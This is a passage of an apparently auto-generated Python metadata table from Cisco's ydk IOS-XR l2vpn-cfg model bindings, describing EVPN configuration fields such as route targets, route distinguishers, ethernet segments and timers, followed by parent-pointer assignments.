[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ipv4-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget',
False,
[
_MetaInfoClassMember('format', REFERENCE_ENUM_CLASS, 'BgpRouteTargetFormatEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetFormatEnum',
[], [],
''' Format of the route target
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'BgpRouteTargetRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetRoleEnum',
[], [],
''' Role of the router target type
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('stitching', REFERENCE_ENUM_CLASS, 'BgpRouteTargetEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetEnum',
[], [],
''' whether RT is Stitching RT
''',
'stitching',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ipv4-address', REFERENCE_LIST, 'Ipv4Address' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address',
[], [],
''' ipv4 address
''',
'ipv4_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('two-byte-as-or-four-byte-as', REFERENCE_LIST, 'TwoByteAsOrFourByteAs' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs',
[], [],
''' two byte as or four byte as
''',
'two_byte_as_or_four_byte_as',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-target',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets',
False,
[
_MetaInfoClassMember('evpn-route-target', REFERENCE_LIST, 'EvpnRouteTarget' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget',
[], [],
''' Name of the Route Target
''',
'evpn_route_target',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-targets',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-distinguisher', REFERENCE_CLASS, 'EvpnRouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'evpn_route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-targets', REFERENCE_CLASS, 'EvpnRouteTargets' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets',
[], [],
''' Route Target
''',
'evpn_route_targets',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('table-policy', ATTRIBUTE, 'str' , None, None,
[], [],
''' Table Policy for installation of forwarding
data to L2FIB
''',
'table_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnevibgp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' EVI ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('evi-load-balancing', REFERENCE_CLASS, 'EviLoadBalancing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing',
[], [],
''' Enter EVI Loadbalancing configuration submode
''',
'evi_load_balancing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-evi-cw-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' CW disable for EVPN EVI
''',
'evpn_evi_cw_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnevi-description', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' Description for EVPN EVI
''',
'evpnevi_description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnevibgp-auto-discovery', REFERENCE_CLASS, 'EvpnevibgpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery',
[], [],
''' Enable Autodiscovery BGP in EVPN EVI
''',
'evpnevibgp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnevi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis',
False,
[
_MetaInfoClassMember('evpnevi', REFERENCE_LIST, 'Evpnevi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi',
[], [],
''' Enter EVPN EVI configuration submode
''',
'evpnevi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnevis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnLoadBalancing' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnLoadBalancing',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable EVPN Loadbalancing
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-flow-label', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Flow Label based load balancing
''',
'evpn_flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-load-balancing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnbgpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnbgpAutoDiscovery',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-distinguisher', REFERENCE_CLASS, 'EvpnRouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'evpn_route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnbgp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Interface-specific timers
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnac-peering', ATTRIBUTE, 'int' , None, None,
[('0', '300')], [],
''' Interface-specific Peering timer
''',
'evpnac_peering',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnac-recovery', ATTRIBUTE, 'int' , None, None,
[('20', '3600')], [],
''' Interface-specific Recovery timer
''',
'evpnac_recovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnac-timers',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0',
False,
[
_MetaInfoClassMember('bytes1', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 1st Byte
''',
'bytes1',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes23', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 2nd and 3rd Bytes
''',
'bytes23',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes45', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 4th and 5th Bytes
''',
'bytes45',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes67', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 6th and 7th Bytes
''',
'bytes67',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes89', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 8th and 9th Bytes
''',
'bytes89',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'identifier-type0',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList',
False,
[
_MetaInfoClassMember('primary', ATTRIBUTE, 'str' , None, None,
[(0, 150)], [],
''' Primary services list
''',
'primary',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('secondary', ATTRIBUTE, 'str' , None, None,
[(0, 150)], [],
''' Secondary services list
''',
'secondary',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'service-list',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Manual service carving
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('service-list', REFERENCE_CLASS, 'ServiceList' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList',
[], [],
''' Manual service carving primary,secondary
lists
''',
'service_list',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'manual-service-carving',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment',
False,
[
_MetaInfoClassMember('backbone-source-mac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Backbone Source MAC
''',
'backbone_source_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Ethernet Segment
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('es-import-route-target', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' ES-Import Route Target
''',
'es_import_route_target',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('force-single-homed', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Force ethernet segment to remain
single-homed
''',
'force_single_homed',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('identifier-type0', REFERENCE_CLASS, 'IdentifierType0' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0',
[], [],
''' Ethernet segment identifier (Type 0)
''',
'identifier_type0',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('load-balancing-per-service', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable per service load balancing mode
''',
'load_balancing_per_service',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('manual-service-carving', REFERENCE_CLASS, 'ManualServiceCarving' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving',
[], [],
''' Enter Manual service carving configuration
submode
''',
'manual_service_carving',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ethernet-segment',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ethernet-segment', REFERENCE_CLASS, 'EthernetSegment' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment',
[], [],
''' Enter Ethernet Segment configuration submode
''',
'ethernet_segment',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnac-timers', REFERENCE_CLASS, 'EvpnacTimers' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers',
[], [],
''' Enter Interface-specific timers configuration
submode
''',
'evpnac_timers',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mac-flush', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MVRP MAC Flush mode
''',
'mac_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces',
False,
[
_MetaInfoClassMember('evpn-interface', REFERENCE_LIST, 'EvpnInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface',
[], [],
''' Attachment circuit interface
''',
'evpn_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables',
False,
[
_MetaInfoClassMember('evpn-interfaces', REFERENCE_CLASS, 'EvpnInterfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces',
[], [],
''' Attachment Circuit interfaces
''',
'evpn_interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-load-balancing', REFERENCE_CLASS, 'EvpnLoadBalancing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnLoadBalancing',
[], [],
''' Enter EVPN Loadbalancing configuration submode
''',
'evpn_load_balancing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-timers', REFERENCE_CLASS, 'EvpnTimers' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnTimers',
[], [],
''' Enter EVPN timers configuration submode
''',
'evpn_timers',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnbgp-auto-discovery', REFERENCE_CLASS, 'EvpnbgpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnbgpAutoDiscovery',
[], [],
''' Enable Autodiscovery BGP in EVPN
''',
'evpnbgp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnevis', REFERENCE_CLASS, 'Evpnevis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis',
[], [],
''' Enter EVPN EVI configuration submode
''',
'evpnevis',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-tables',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn' : {
'meta_info' : _MetaInfoClass('Evpn',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable EVPN feature
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-tables', REFERENCE_CLASS, 'EvpnTables' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables',
[], [],
''' EVPN submodes
''',
'evpn_tables',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
}
# Wire up parent pointers between the generated meta-info classes: each child
# entry's _MetaInfoClass gets a reference to the _MetaInfoClass of its
# enclosing container, mirroring the containment hierarchy of the
# Cisco-IOS-XR-l2vpn-cfg YANG model. This section (like the rest of the file)
# appears to be machine-generated by ydk-gen — do not edit by hand; regenerate
# from the YANG source instead.
_meta_table['L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher']['meta_info'].parent =_meta_table['L2Vpn.PwRouting.PwRoutingBgp']['meta_info']
_meta_table['L2Vpn.PwRouting.PwRoutingBgp']['meta_info'].parent =_meta_table['L2Vpn.PwRouting']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire']['meta_info']
